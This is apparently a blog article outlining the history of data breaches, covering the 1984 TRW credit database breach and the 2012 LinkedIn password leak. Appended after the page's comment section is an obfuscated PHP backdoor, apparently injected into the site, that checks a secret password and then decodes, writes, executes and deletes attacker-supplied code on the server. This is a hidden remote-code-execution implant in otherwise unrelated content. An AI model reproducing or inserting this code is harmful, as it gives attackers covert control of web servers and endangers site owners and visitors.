• 25th June 2024

The Origin of Data Breach and Their Historical Chronology

The data breaches are no more an unusual incident and they have been commonly happening over the decades since a long time. The digital data breach originated much before the popular use of the internet, but still, they have been happening as well as are performed the same way as before. The data breach as part of overall cyber security breach has been performed for the last two-three decades, but as one of the landmark incident, it occurred in the year 1984 with the TRW Information System which known as the Experian today.

The TRW Information System was a credit reporting agency then. When the TRW Information System realised that one of the files in the database had been breached, it eventually understood how the breach was performed. During those periods the trove was protected by a password that was numeric in nature, and somebody took it and posted on a board of electronic bulletin. This was the source which served as a vulnerability for the TRW Information System data breach.

The TRW Information System data breach attackers gained access to sensitive information such as credit history and other personal details of 90 million US residents. The hacked password remained exposed for one month and then the TRW Information System declared that they changed the database password as soon as they knew about the data breach. One after another massive and large-scale data breach incidents occurred after the TRW Information System data breach incident regularly.

Then came the era of smartphone and IoT during early 2010 which ultimately expanded the interconnectivity. This was the time when data breach flourished resulting in alarming cybersecurity issues and concerns. Through data breach, the attackers could gain enormous personal sensitive information such as username and password, credit card information, etc. which was sufficient for the attackers to control the entire online life of the target victims.

This was clearly visible in the LinkedIn data breach incident in the year 2012 which eventually exposed the password of 6.5 million people. The hackers cracked the hashes in order to expose the users of LinkedIn and though LinkedIn tried precautions for resetting the affected passwords, the attacker could find other passwords from the web where the users used the same passwords. Eventually, this incident resulted in a hazard which ultimately taught that a single data breach incident can haunt the victims for years. 

Read Previous

Top 5 Shopping Tips For The Newborn Twins

Read Next

Selecting a right layout for your kitchen: Get an idea here!

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}